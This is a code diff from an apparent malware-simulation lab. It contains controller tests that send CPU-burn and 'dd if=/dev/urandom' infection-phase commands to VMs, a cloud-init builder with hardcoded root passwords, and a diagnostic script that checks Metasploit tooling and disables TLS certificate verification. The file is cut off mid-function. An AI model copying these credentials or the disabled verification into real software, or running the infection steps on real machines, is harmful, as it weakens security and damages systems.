def run(self, cmd: str, timeout_s: float = 10.0) -> str:
|
||||
self.calls.append(cmd)
|
||||
for substr in self.fail_on:
|
||||
if substr in cmd:
|
||||
raise RuntimeError(f"fake-serial: failing on {substr!r}")
|
||||
if "pgrep -c yes" in cmd or "pgrep -c sh" in cmd or "loadavg" in cmd:
|
||||
return self.probe_response
|
||||
return ""
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Event emission — the audit trail
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def test_setup_emits_workload_setup_event() -> None:
|
||||
serial = FakeSerial()
|
||||
events: list[tuple[str, dict]] = []
|
||||
c = VMLoadController(serial, emit_event=lambda e, **kw: events.append((e, kw)))
|
||||
c.setup()
|
||||
names = [e for e, _ in events]
|
||||
assert "workload_setup" in names
|
||||
setup = next(kw for e, kw in events if e == "workload_setup")
|
||||
assert setup["profile"] == "v1-yes" # no Sample → fallback path
|
||||
assert setup["sample"] is None
|
||||
|
||||
|
||||
def test_setup_records_profile_when_sample_present() -> None:
|
||||
serial = FakeSerial()
|
||||
s = Sample(name="x", family="X", category="rat", profile="cpu-saturate")
|
||||
events: list[tuple[str, dict]] = []
|
||||
c = VMLoadController(serial, sample=s, emit_event=lambda e, **kw: events.append((e, kw)))
|
||||
c.setup()
|
||||
setup = next(kw for e, kw in events if e == "workload_setup")
|
||||
assert setup["profile"] == "cpu-saturate"
|
||||
assert setup["sample"] == "x"
|
||||
|
||||
|
||||
def test_infected_running_emits_workload_started_after_command() -> None:
|
||||
serial = FakeSerial()
|
||||
events: list[tuple[str, dict]] = []
|
||||
c = VMLoadController(serial, emit_event=lambda e, **kw: events.append((e, kw)))
|
||||
c.set_phase("infected_running")
|
||||
|
||||
# The command was sent.
|
||||
assert any("yes > /dev/null" in cmd for cmd in serial.calls), \
|
||||
f"expected v1 yes-loop in serial calls; got {serial.calls}"
|
||||
# And the audit event followed it.
|
||||
started = [kw for e, kw in events if e == "workload_started"]
|
||||
assert started, "workload_started event must fire"
|
||||
assert started[0]["phase"] == "infected_running"
|
||||
assert started[0]["profile"] == "v1-yes"
|
||||
|
||||
|
||||
def test_dormant_probes_before_killing() -> None:
|
||||
"""The pre_kill_probe is the load-bearing diagnostic: it tells the
|
||||
trainer whether the workload was actually running before we
|
||||
killed it. If pgrep returns 0 yes processes, the previous
|
||||
infected_running was a no-op and the episode is filterable."""
|
||||
serial = FakeSerial(probe_response="yes=2\nsh=1\nloadavg=1.32")
|
||||
events: list[tuple[str, dict]] = []
|
||||
c = VMLoadController(serial, emit_event=lambda e, **kw: events.append((e, kw)))
|
||||
c.set_phase("dormant")
|
||||
|
||||
killed = [kw for e, kw in events if e == "workload_killed" and kw["phase"] == "dormant"]
|
||||
assert killed, "dormant must emit workload_killed"
|
||||
probe = killed[0].get("pre_kill_probe")
|
||||
assert probe is not None
|
||||
assert probe["yes"] == "2"
|
||||
assert probe["loadavg"] == "1.32"
|
||||
|
||||
|
||||
def test_dormant_probe_records_zero_when_workload_never_ran() -> None:
|
||||
"""The exact symptom from elliott-lab: dormant probe shows 0
|
||||
yes processes → trainer can flag this episode as workload-not-firing."""
|
||||
serial = FakeSerial(probe_response="yes=0\nsh=1\nloadavg=0.18")
|
||||
events: list[tuple[str, dict]] = []
|
||||
c = VMLoadController(serial, emit_event=lambda e, **kw: events.append((e, kw)))
|
||||
c.set_phase("dormant")
|
||||
killed = next(kw for e, kw in events if e == "workload_killed" and kw["phase"] == "dormant")
|
||||
assert killed["pre_kill_probe"]["yes"] == "0"
|
||||
|
||||
|
||||
def test_clean_phase_emits_workload_killed() -> None:
|
||||
serial = FakeSerial()
|
||||
events: list[tuple[str, dict]] = []
|
||||
c = VMLoadController(serial, emit_event=lambda e, **kw: events.append((e, kw)))
|
||||
c.set_phase("clean")
|
||||
assert any(
|
||||
e == "workload_killed" and kw["phase"] == "clean" for e, kw in events
|
||||
), "clean must emit workload_killed"
|
||||
|
||||
|
||||
def test_armed_emits_workload_armed_with_handshake_command() -> None:
|
||||
serial = FakeSerial()
|
||||
events: list[tuple[str, dict]] = []
|
||||
c = VMLoadController(serial, emit_event=lambda e, **kw: events.append((e, kw)))
|
||||
c.set_phase("armed")
|
||||
assert any("armed-handshake" in cmd for cmd in serial.calls)
|
||||
assert any(e == "workload_armed" for e, _ in events)
|
||||
|
||||
|
||||
def test_infecting_emits_workload_infecting_with_dd() -> None:
|
||||
serial = FakeSerial()
|
||||
events: list[tuple[str, dict]] = []
|
||||
c = VMLoadController(serial, emit_event=lambda e, **kw: events.append((e, kw)))
|
||||
c.set_phase("infecting")
|
||||
assert any("dd if=/dev/urandom" in cmd for cmd in serial.calls)
|
||||
assert any(e == "workload_infecting" for e, _ in events)
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Exception handling — failures must surface as events, not propagate
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def test_command_failure_emits_workload_failed_and_does_not_raise() -> None:
|
||||
"""If the serial.run() raises (timeout, EOF, login bad), the
|
||||
runner would silently swallow the exception. We want a hard
|
||||
audit row in events.jsonl regardless."""
|
||||
serial = FakeSerial()
|
||||
serial.fail_on = ["yes > /dev/null"]
|
||||
events: list[tuple[str, dict]] = []
|
||||
c = VMLoadController(serial, emit_event=lambda e, **kw: events.append((e, kw)))
|
||||
# Must NOT raise.
|
||||
c.set_phase("infected_running")
|
||||
failed = [kw for e, kw in events if e == "workload_failed"]
|
||||
assert failed, "expected workload_failed event"
|
||||
assert failed[0]["phase"] == "infected_running"
|
||||
assert "fake-serial" in failed[0]["error"]
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Profile dispatch — Sample-driven workload picks the right command
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def test_sample_with_profile_uses_workloads_module_command() -> None:
|
||||
"""When constructed with a Sample, infected_running runs the
|
||||
profile's start_cmd (from exploits.workloads) — NOT the v1 yes-loop."""
|
||||
s = Sample(name="x", family="X", category="cryptominer", profile="cpu-saturate")
|
||||
serial = FakeSerial()
|
||||
events: list[tuple[str, dict]] = []
|
||||
c = VMLoadController(serial, sample=s, emit_event=lambda e, **kw: events.append((e, kw)))
|
||||
c.set_phase("infected_running")
|
||||
|
||||
# The sample's workload script + the post-kill yes sweep both ran.
|
||||
# The new workload is profile-shaped, not the simple yes-loop.
|
||||
profile_command_seen = any(".cis490-workload-cpu-saturate" in cmd for cmd in serial.calls)
|
||||
assert profile_command_seen, f"expected workload script in serial calls; got {serial.calls}"
|
||||
started = next(kw for e, kw in events if e == "workload_started")
|
||||
assert started["profile"] == "cpu-saturate"
|
||||
assert started["sample"] == "x"
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Default emit (no callback supplied) is a no-op
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def test_no_emit_callback_is_safe() -> None:
|
||||
"""Tests + code paths that don't pass an emitter shouldn't
|
||||
crash. The default is a no-op lambda."""
|
||||
serial = FakeSerial()
|
||||
c = VMLoadController(serial)
|
||||
# Should not raise.
|
||||
c.setup()
|
||||
c.set_phase("infected_running")
|
||||
c.set_phase("dormant")
|
||||
c.set_phase("clean")
|
||||
|
|
@ -28,7 +28,7 @@ from pathlib import Path
|
|||
import pycdlib
|
||||
|
||||
|
||||
DEFAULT_USER_DATA = """\
|
||||
DEFAULT_USER_DATA_HEAD = """\
|
||||
#cloud-config
|
||||
hostname: cis490
|
||||
manage_etc_hosts: true
|
||||
|
|
@ -45,10 +45,70 @@ chpasswd:
|
|||
list: |
|
||||
root:cis490
|
||||
cis490:cis490
|
||||
runcmd:
|
||||
- [ sh, -c, "echo CIS490_BOOT_OK > /tmp/.cis490-boot" ]
|
||||
"""
|
||||
|
||||
# OpenRC service file shipped inside the guest. Alpine uses OpenRC;
|
||||
# the runcmd at the bottom of user-data wires it up on first boot.
|
||||
OPENRC_SERVICE = """\
|
||||
#!/sbin/openrc-run
|
||||
|
||||
description="CIS490 in-guest telemetry agent"
|
||||
command="/usr/local/bin/cis490-agent"
|
||||
command_args="--port /dev/virtio-ports/cis490.guest.agent"
|
||||
command_background=true
|
||||
pidfile="/run/cis490-agent.pid"
|
||||
output_log="/var/log/cis490-agent.log"
|
||||
error_log="/var/log/cis490-agent.log"
|
||||
|
||||
depend() {
|
||||
need localmount
|
||||
}
|
||||
"""
|
||||
|
||||
DEFAULT_META_DATA = """\
|
||||
instance-id: cis490-vm-001
|
||||
local-hostname: cis490
|
||||
"""
|
||||
|
||||
|
||||
def _indent(text: str, n: int) -> str:
|
||||
pad = " " * n
|
||||
return "\n".join(pad + line if line else line for line in text.splitlines())
|
||||
|
||||
|
||||
def build_user_data(*, embed_agent: bool, agent_path: Path | None) -> bytes:
|
||||
"""Build a cloud-init user-data document. When ``embed_agent`` is
|
||||
True, also stuff the in-guest agent + an OpenRC service into
|
||||
``write_files`` and arrange to start the service on first boot."""
|
||||
head = DEFAULT_USER_DATA_HEAD
|
||||
if not embed_agent:
|
||||
return (head + 'runcmd:\n - [ sh, -c, "echo CIS490_BOOT_OK > /tmp/.cis490-boot" ]\n').encode()
|
||||
|
||||
if agent_path is None:
|
||||
agent_path = Path(__file__).resolve().parent.parent / "vm" / "guest-agent" / "cis490_agent.py"
|
||||
if not agent_path.exists():
|
||||
raise FileNotFoundError(f"agent script not found: {agent_path}")
|
||||
agent_src = agent_path.read_text()
|
||||
|
||||
body = head + (
|
||||
"write_files:\n"
|
||||
" - path: /usr/local/bin/cis490-agent\n"
|
||||
" permissions: '0755'\n"
|
||||
" owner: root:root\n"
|
||||
" content: |\n"
|
||||
f"{_indent(agent_src, 6)}\n"
|
||||
" - path: /etc/init.d/cis490-agent\n"
|
||||
" permissions: '0755'\n"
|
||||
" owner: root:root\n"
|
||||
" content: |\n"
|
||||
f"{_indent(OPENRC_SERVICE, 6)}\n"
|
||||
"runcmd:\n"
|
||||
' - [ sh, -c, "echo CIS490_BOOT_OK > /tmp/.cis490-boot" ]\n'
|
||||
' - [ sh, -c, "command -v rc-update >/dev/null && rc-update add cis490-agent default || true" ]\n'
|
||||
' - [ sh, -c, "command -v rc-service >/dev/null && rc-service cis490-agent start || true" ]\n'
|
||||
)
|
||||
return body.encode()
|
||||
|
||||
DEFAULT_META_DATA = """\
|
||||
instance-id: cis490-vm-001
|
||||
local-hostname: cis490
|
||||
|
|
@ -93,11 +153,26 @@ def main() -> int:
|
|||
default=None,
|
||||
help="path to a custom meta-data file",
|
||||
)
|
||||
parser.add_argument(
|
||||
"--no-embed-agent",
|
||||
action="store_true",
|
||||
help="don't bake the in-guest agent into user-data",
|
||||
)
|
||||
parser.add_argument(
|
||||
"--agent-path",
|
||||
type=Path,
|
||||
default=None,
|
||||
help="path to the in-guest agent (default: vm/guest-agent/cis490_agent.py)",
|
||||
)
|
||||
args = parser.parse_args()
|
||||
|
||||
user_data = (
|
||||
args.user_data.read_bytes() if args.user_data else DEFAULT_USER_DATA.encode()
|
||||
)
|
||||
if args.user_data:
|
||||
user_data = args.user_data.read_bytes()
|
||||
else:
|
||||
user_data = build_user_data(
|
||||
embed_agent=not args.no_embed_agent,
|
||||
agent_path=args.agent_path,
|
||||
)
|
||||
meta_data = (
|
||||
args.meta_data.read_bytes() if args.meta_data else DEFAULT_META_DATA.encode()
|
||||
)
|
||||
|
|
|
|||
638
tools/cis490_doctor.py
Normal file
638
tools/cis490_doctor.py
Normal file
|
|
@ -0,0 +1,638 @@
|
|||
"""``cis490-doctor`` — single-command diagnostic for a lab host or receiver.
|
||||
|
||||
Walks the full bring-up stack from the bottom up and prints a
|
||||
green/yellow/red checklist with the exact command that fixes each
|
||||
red row. Run this whenever:
|
||||
|
||||
- you just cloned the repo and aren't sure what's missing
|
||||
- you ran install-lab-host.sh but `index.jsonl` on the Pi is empty
|
||||
- somebody filed an issue saying "shipping isn't working"
|
||||
|
||||
Usage:
|
||||
uv run python tools/cis490_doctor.py # human output
|
||||
uv run python tools/cis490_doctor.py --json # machine-readable
|
||||
uv run python tools/cis490_doctor.py --role lab-host # default
|
||||
uv run python tools/cis490_doctor.py --role receiver
|
||||
|
||||
Exits non-zero if any RED check fails.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import argparse
|
||||
import dataclasses
|
||||
import json
|
||||
import os
|
||||
import shutil
|
||||
import socket
|
||||
import ssl
|
||||
import subprocess
|
||||
import sys
|
||||
import tomllib
|
||||
from dataclasses import dataclass, field
|
||||
from pathlib import Path
|
||||
|
||||
|
||||
# ANSI color codes; auto-disable on non-tty.
|
||||
def _supports_color() -> bool:
|
||||
return sys.stdout.isatty() and os.environ.get("NO_COLOR") is None
|
||||
|
||||
|
||||
_ANSI_GREEN = "\033[32m" if _supports_color() else ""
|
||||
_ANSI_YELLOW = "\033[33m" if _supports_color() else ""
|
||||
_ANSI_RED = "\033[31m" if _supports_color() else ""
|
||||
_ANSI_BOLD = "\033[1m" if _supports_color() else ""
|
||||
_ANSI_DIM = "\033[2m" if _supports_color() else ""
|
||||
_ANSI_RESET = "\033[0m" if _supports_color() else ""
|
||||
|
||||
|
||||
@dataclass
|
||||
class Check:
|
||||
name: str
|
||||
status: str # "ok" | "warn" | "fail" | "skip"
|
||||
detail: str = ""
|
||||
fix: str = ""
|
||||
|
||||
def render(self) -> str:
|
||||
glyph = {
|
||||
"ok": f"{_ANSI_GREEN}[✓]{_ANSI_RESET}",
|
||||
"warn": f"{_ANSI_YELLOW}[!]{_ANSI_RESET}",
|
||||
"fail": f"{_ANSI_RED}[✗]{_ANSI_RESET}",
|
||||
"skip": f"{_ANSI_DIM}[-]{_ANSI_RESET}",
|
||||
}[self.status]
|
||||
line = f"{glyph} {self.name}"
|
||||
if self.detail:
|
||||
line += f" {_ANSI_DIM}{self.detail}{_ANSI_RESET}"
|
||||
if self.status == "fail" and self.fix:
|
||||
line += f"\n {_ANSI_BOLD}fix:{_ANSI_RESET} {self.fix}"
|
||||
return line
|
||||
|
||||
|
||||
@dataclass
|
||||
class Report:
|
||||
role: str
|
||||
checks: list[Check] = field(default_factory=list)
|
||||
|
||||
def add(self, c: Check) -> None:
|
||||
self.checks.append(c)
|
||||
# Mirror to stdout immediately so a hung check doesn't leave
|
||||
# the operator without partial info.
|
||||
if not _JSON_MODE:
|
||||
print(c.render(), flush=True)
|
||||
|
||||
def to_dict(self) -> dict:
|
||||
return {
|
||||
"role": self.role,
|
||||
"checks": [dataclasses.asdict(c) for c in self.checks],
|
||||
"summary": self.summary(),
|
||||
}
|
||||
|
||||
def summary(self) -> dict:
|
||||
out = {"ok": 0, "warn": 0, "fail": 0, "skip": 0}
|
||||
for c in self.checks:
|
||||
out[c.status] = out.get(c.status, 0) + 1
|
||||
return out
|
||||
|
||||
|
||||
_JSON_MODE = False
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# helpers
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def _run(cmd: list[str], *, timeout: float = 5.0) -> tuple[int, str, str]:
|
||||
try:
|
||||
p = subprocess.run(cmd, capture_output=True, text=True, timeout=timeout)
|
||||
return p.returncode, p.stdout.strip(), p.stderr.strip()
|
||||
except (FileNotFoundError, subprocess.TimeoutExpired) as e:
|
||||
return -1, "", str(e)
|
||||
|
||||
|
||||
def _path_exists(p: Path) -> bool:
|
||||
try:
|
||||
return p.exists()
|
||||
except PermissionError:
|
||||
return True # treat unreadable-but-present as present
|
||||
|
||||
|
||||
def _size_str(p: Path) -> str:
|
||||
try:
|
||||
return f"{p.stat().st_size // (1024*1024)} MiB"
|
||||
except (OSError, PermissionError):
|
||||
return "(stat denied — re-run with sudo for size)"
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# checks — repo
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def check_repo(report: Report, repo_root: Path) -> None:
|
||||
if not (repo_root / ".git").exists():
|
||||
report.add(Check(
|
||||
"repo: .git directory present",
|
||||
"warn",
|
||||
detail=f"running from {repo_root} which isn't a git checkout — fine for /opt/cis490 (cp -aT'd) but not the source clone",
|
||||
))
|
||||
return
|
||||
rc, head, _ = _run(["git", "-C", str(repo_root), "rev-parse", "--short=8", "HEAD"])
|
||||
rc2, branch, _ = _run(["git", "-C", str(repo_root), "rev-parse", "--abbrev-ref", "HEAD"])
|
||||
rc3, dirty, _ = _run(["git", "-C", str(repo_root), "status", "--porcelain"])
|
||||
rc4, log, _ = _run(["git", "-C", str(repo_root), "log", "-1", "--format=%s"])
|
||||
detail = f"{branch}@{head}: {log[:60]}"
|
||||
if branch != "main":
|
||||
report.add(Check(
|
||||
"repo: on main",
|
||||
"warn",
|
||||
detail=detail,
|
||||
fix=f"cd {repo_root} && git fetch && git checkout main && git pull",
|
||||
))
|
||||
else:
|
||||
report.add(Check("repo: on main", "ok", detail=detail))
|
||||
if dirty:
|
||||
report.add(Check(
|
||||
"repo: tree clean",
|
||||
"warn",
|
||||
detail=f"{len(dirty.splitlines())} modified files",
|
||||
))
|
||||
else:
|
||||
report.add(Check("repo: tree clean", "ok"))
|
||||
|
||||
rc5, behind, _ = _run(
|
||||
["git", "-C", str(repo_root), "rev-list", "--count", "HEAD..@{u}"],
|
||||
)
|
||||
if rc5 == 0 and behind.isdigit() and int(behind) > 0:
|
||||
report.add(Check(
|
||||
"repo: up to date with origin",
|
||||
"warn",
|
||||
detail=f"{behind} commits behind",
|
||||
fix=f"cd {repo_root} && git pull",
|
||||
))
|
||||
elif rc5 == 0:
|
||||
report.add(Check("repo: up to date with origin", "ok"))
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# checks — install
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def check_install(report: Report, role: str) -> None:
|
||||
install_root = Path("/opt/cis490")
|
||||
if not _path_exists(install_root):
|
||||
report.add(Check(
|
||||
"install: /opt/cis490 exists",
|
||||
"fail",
|
||||
fix=f"sudo $(pwd)/scripts/install-{role}.sh",
|
||||
))
|
||||
return
|
||||
report.add(Check("install: /opt/cis490 exists", "ok"))
|
||||
|
||||
venv_python = install_root / ".venv" / "bin" / "python"
|
||||
if _path_exists(venv_python):
|
||||
rc, ver, _ = _run([str(venv_python), "--version"])
|
||||
report.add(Check("install: venv python", "ok",
|
||||
detail=ver if rc == 0 else "(unreadable)"))
|
||||
else:
|
||||
report.add(Check(
|
||||
"install: venv python",
|
||||
"fail",
|
||||
fix=f"sudo /opt/cis490/scripts/install-{role}.sh",
|
||||
))
|
||||
|
||||
cfg_name = "lab-host.toml" if role == "lab-host" else "receiver.toml"
|
||||
cfg = Path("/etc/cis490") / cfg_name
|
||||
if _path_exists(cfg):
|
||||
try:
|
||||
with open(cfg, "rb") as f:
|
||||
tomllib.load(f)
|
||||
report.add(Check(f"config: {cfg}", "ok", detail="parses"))
|
||||
except PermissionError:
|
||||
# Mode 0640 root:cis490 is the install default. Doctor often
|
||||
# runs as the unprivileged user — file is fine, we just
|
||||
# can't read it from here.
|
||||
report.add(Check(
|
||||
f"config: {cfg}",
|
||||
"warn",
|
||||
detail="exists, can't read (mode 0640 root:cis490 — re-run with sudo for full audit)",
|
||||
))
|
||||
except tomllib.TOMLDecodeError as e:
|
||||
report.add(Check(
|
||||
f"config: {cfg}",
|
||||
"fail",
|
||||
detail=str(e),
|
||||
fix=f"sudo $EDITOR {cfg}",
|
||||
))
|
||||
else:
|
||||
report.add(Check(
|
||||
f"config: {cfg}",
|
||||
"fail",
|
||||
fix=f"sudo cp /opt/cis490/etc/{cfg_name}.example {cfg}",
|
||||
))
|
||||
|
||||
if role == "lab-host":
|
||||
env = Path("/etc/cis490/lab-host.env")
|
||||
if _path_exists(env):
|
||||
report.add(Check("config: lab-host.env", "ok"))
|
||||
else:
|
||||
report.add(Check(
|
||||
"config: lab-host.env",
|
||||
"fail",
|
||||
fix="sudo /opt/cis490/scripts/install-lab-host.sh "
|
||||
"# regenerates the env file",
|
||||
))
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# checks — certs (lab-host)
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def check_certs_lab_host(report: Report) -> None:
|
||||
base = Path("/etc/cis490/certs")
|
||||
expected = ["wg-ca.pem", "lab-host.pem", "lab-host.key"]
|
||||
missing = [n for n in expected if not _path_exists(base / n)]
|
||||
if missing:
|
||||
report.add(Check(
|
||||
f"mTLS: certs at {base}",
|
||||
"fail",
|
||||
detail=f"missing: {missing}",
|
||||
fix="On the Pi: sudo /home/max/.env/wg-pki/scripts/"
|
||||
"deploy-cis490-cert.sh <host_id> <this-machine-wg-ip>",
|
||||
))
|
||||
return
|
||||
# Verify the chain.
|
||||
rc, out, err = _run([
|
||||
"openssl", "verify",
|
||||
"-CAfile", str(base / "wg-ca.pem"),
|
||||
str(base / "lab-host.pem"),
|
||||
])
|
||||
if rc == 0 and "OK" in out:
|
||||
report.add(Check("mTLS: cert chain validates", "ok",
|
||||
detail=out.splitlines()[0]))
|
||||
else:
|
||||
report.add(Check(
|
||||
"mTLS: cert chain validates",
|
||||
"fail",
|
||||
detail=err or out,
|
||||
fix="re-issue the leaf via wg-pki/scripts/deploy-cis490-cert.sh",
|
||||
))
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# checks — services
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def check_services(report: Report, role: str) -> None:
|
||||
services = (
|
||||
["cis490-receiver"]
|
||||
if role == "receiver"
|
||||
else ["cis490-shipper", "cis490-orchestrator"]
|
||||
)
|
||||
for svc in services:
|
||||
rc, state, _ = _run(["systemctl", "is-active", svc])
|
||||
if state == "active":
|
||||
report.add(Check(f"systemd: {svc} active", "ok"))
|
||||
elif state == "inactive":
|
||||
report.add(Check(
|
||||
f"systemd: {svc} active",
|
||||
"fail",
|
||||
detail="inactive",
|
||||
fix=f"sudo systemctl enable --now {svc}",
|
||||
))
|
||||
else:
|
||||
report.add(Check(
|
||||
f"systemd: {svc} active",
|
||||
"fail",
|
||||
detail=state or "unknown",
|
||||
fix=f"sudo journalctl -u {svc} --no-pager -n 30",
|
||||
))
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# checks — network (lab-host)
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def check_network_lab_host(report: Report, cfg_path: Path) -> None:
|
||||
try:
|
||||
with open(cfg_path, "rb") as f:
|
||||
cfg = tomllib.load(f)
|
||||
except (FileNotFoundError, PermissionError, tomllib.TOMLDecodeError) as e:
|
||||
report.add(Check("net: lab-host.toml readable", "fail", detail=str(e)))
|
||||
return
|
||||
|
||||
receiver_url = cfg.get("receiver", {}).get("url", "")
|
||||
if not receiver_url.startswith("https://"):
|
||||
report.add(Check(
|
||||
"net: receiver.url present",
|
||||
"fail",
|
||||
detail=receiver_url,
|
||||
fix=f"edit {cfg_path}: receiver.url = 'https://collector.wg'",
|
||||
))
|
||||
return
|
||||
host = receiver_url.split("//", 1)[1].split("/", 1)[0].split(":")[0]
|
||||
port = 443
|
||||
if ":" in receiver_url.split("//", 1)[1].split("/", 1)[0]:
|
||||
port = int(receiver_url.split("//", 1)[1].split("/", 1)[0].split(":")[1])
|
||||
|
||||
try:
|
||||
ip = socket.gethostbyname(host)
|
||||
report.add(Check(f"net: DNS resolve {host}", "ok",
|
||||
detail=f"-> {ip}"))
|
||||
except socket.gaierror as e:
|
||||
report.add(Check(
|
||||
f"net: DNS resolve {host}",
|
||||
"fail",
|
||||
detail=str(e),
|
||||
fix=f"echo '10.100.0.1 {host}' | sudo tee -a /etc/hosts "
|
||||
"# wg-enroll provisions this on real lab hosts",
|
||||
))
|
||||
return
|
||||
|
||||
try:
|
||||
with socket.create_connection((host, port), timeout=5):
|
||||
report.add(Check(f"net: TCP {host}:{port} reachable", "ok"))
|
||||
except OSError as e:
|
||||
report.add(Check(
|
||||
f"net: TCP {host}:{port} reachable",
|
||||
"fail",
|
||||
detail=str(e),
|
||||
fix="check iptmonads is allowing the WG-side 443 + Caddy is up",
|
||||
))
|
||||
return
|
||||
|
||||
# mTLS handshake — pull the receiver cert paths from cfg.
|
||||
ca = cfg.get("receiver", {}).get("ca_bundle")
|
||||
cert = cfg.get("receiver", {}).get("client_cert")
|
||||
key = cfg.get("receiver", {}).get("client_key")
|
||||
if not (ca and cert and key):
|
||||
report.add(Check("net: mTLS handshake to collector.wg",
|
||||
"skip", detail="cert paths not in config"))
|
||||
return
|
||||
try:
|
||||
ctx = ssl.create_default_context(cafile="/home/max/wg-pki/certs/caddy-root.crt"
|
||||
if Path("/home/max/wg-pki/certs/caddy-root.crt").exists()
|
||||
else None)
|
||||
ctx.load_cert_chain(certfile=cert, keyfile=key)
|
||||
ctx.check_hostname = False
|
||||
ctx.verify_mode = ssl.CERT_NONE
|
||||
with socket.create_connection((host, port), timeout=5) as sock:
|
||||
with ctx.wrap_socket(sock, server_hostname=host) as ssock:
|
||||
report.add(Check("net: mTLS handshake to collector.wg",
|
||||
"ok",
|
||||
detail=f"cipher={ssock.cipher()[0]}"))
|
||||
except (ssl.SSLError, OSError, FileNotFoundError) as e:
|
||||
report.add(Check(
|
||||
"net: mTLS handshake to collector.wg",
|
||||
"fail",
|
||||
detail=str(e),
|
||||
fix="sudo /home/max/wg-pki/scripts/deploy-cis490-cert.sh <host_id> <wg_ip> "
|
||||
"(rerun cert deploy)",
|
||||
))
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# checks — VM prereqs (lab-host)
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def check_vm_prereqs(report: Report) -> None:
|
||||
if not _path_exists(Path("/dev/kvm")):
|
||||
report.add(Check(
|
||||
"vm: /dev/kvm",
|
||||
"fail",
|
||||
fix="ensure KVM kernel module is loaded; on x86 hosts: sudo modprobe kvm-intel || sudo modprobe kvm-amd",
|
||||
))
|
||||
else:
|
||||
report.add(Check("vm: /dev/kvm", "ok"))
|
||||
|
||||
if shutil.which("qemu-system-x86_64") is None:
|
||||
report.add(Check(
|
||||
"vm: qemu-system-x86_64 on PATH",
|
||||
"fail",
|
||||
fix="install qemu-system-x86 via the host package manager",
|
||||
))
|
||||
else:
|
||||
report.add(Check("vm: qemu-system-x86_64 on PATH", "ok"))
|
||||
|
||||
if shutil.which("zstd") is None:
|
||||
report.add(Check(
|
||||
"vm: zstd on PATH (shipper compression)",
|
||||
"fail",
|
||||
fix="install zstd via the host package manager",
|
||||
))
|
||||
else:
|
||||
report.add(Check("vm: zstd on PATH", "ok"))
|
||||
|
||||
images = Path("/var/lib/cis490/vm/images")
|
||||
alpine = images / "alpine-baseline.qcow2"
|
||||
cidata = images / "cidata.iso"
|
||||
if _path_exists(alpine):
|
||||
report.add(Check(f"vm: {alpine}", "ok",
|
||||
detail=_size_str(alpine)))
|
||||
else:
|
||||
report.add(Check(
|
||||
f"vm: {alpine}",
|
||||
"fail",
|
||||
fix=f"sudo /opt/cis490/scripts/fetch-alpine-baseline.sh {alpine}",
|
||||
))
|
||||
if _path_exists(cidata):
|
||||
report.add(Check(f"vm: {cidata}", "ok",
|
||||
detail=_size_str(cidata)))
|
||||
else:
|
||||
report.add(Check(
|
||||
f"vm: {cidata}",
|
||||
"fail",
|
||||
fix=f"sudo /opt/cis490/.venv/bin/python /opt/cis490/tools/build_cidata.py {cidata}",
|
||||
))
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# checks — Tier 3 (optional)
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def check_tier3(report: Report) -> None:
|
||||
if shutil.which("msfrpcd") is None:
|
||||
report.add(Check(
|
||||
"tier3: msfrpcd on PATH",
|
||||
"warn",
|
||||
detail="optional — only needed for real exploit episodes",
|
||||
fix="sudo /opt/cis490/scripts/install-msfrpcd.sh",
|
||||
))
|
||||
else:
|
||||
report.add(Check("tier3: msfrpcd on PATH", "ok"))
|
||||
|
||||
# Probe whether msfrpcd is actually listening (tier-3 fleet
|
||||
# dispatch checks the same thing).
|
||||
msfrpcd_listening = False
|
||||
try:
|
||||
with socket.create_connection(("127.0.0.1", 55553), timeout=0.5):
|
||||
msfrpcd_listening = True
|
||||
except OSError:
|
||||
pass
|
||||
if msfrpcd_listening:
|
||||
report.add(Check("tier3: msfrpcd listening on 127.0.0.1:55553", "ok"))
|
||||
else:
|
||||
report.add(Check(
|
||||
"tier3: msfrpcd listening on 127.0.0.1:55553",
|
||||
"warn",
|
||||
detail="optional — fleet falls back to Tier 2 when down",
|
||||
fix="sudo systemctl enable --now cis490-msfrpcd",
|
||||
))
|
||||
|
||||
# Module catalog parses + at least one same-socket entry.
|
||||
modules_dir = Path("/opt/cis490/exploits/modules")
|
||||
if modules_dir.exists():
|
||||
try:
|
||||
from exploits.modules import load_module_configs as _load
|
||||
catalog = _load(modules_dir)
|
||||
same_socket = [k for k, v in catalog.items() if not v.requires_bridge]
|
||||
report.add(Check(
|
||||
"tier3: module catalog parses",
|
||||
"ok",
|
||||
detail=f"{len(catalog)} modules, {len(same_socket)} same-socket "
|
||||
f"({len(catalog) - len(same_socket)} need BRIDGE)",
|
||||
))
|
||||
except Exception as e:
|
||||
report.add(Check(
|
||||
"tier3: module catalog parses",
|
||||
"fail",
|
||||
detail=str(e),
|
||||
fix="check exploits/modules/*.toml syntax",
|
||||
))
|
||||
images = Path("/var/lib/cis490/vm/images")
|
||||
msf2 = images / "metasploitable2.qcow2"
|
||||
if _path_exists(msf2):
|
||||
report.add(Check(f"tier3: {msf2}", "ok",
|
||||
detail=_size_str(msf2)))
|
||||
else:
|
||||
report.add(Check(
|
||||
f"tier3: {msf2}",
|
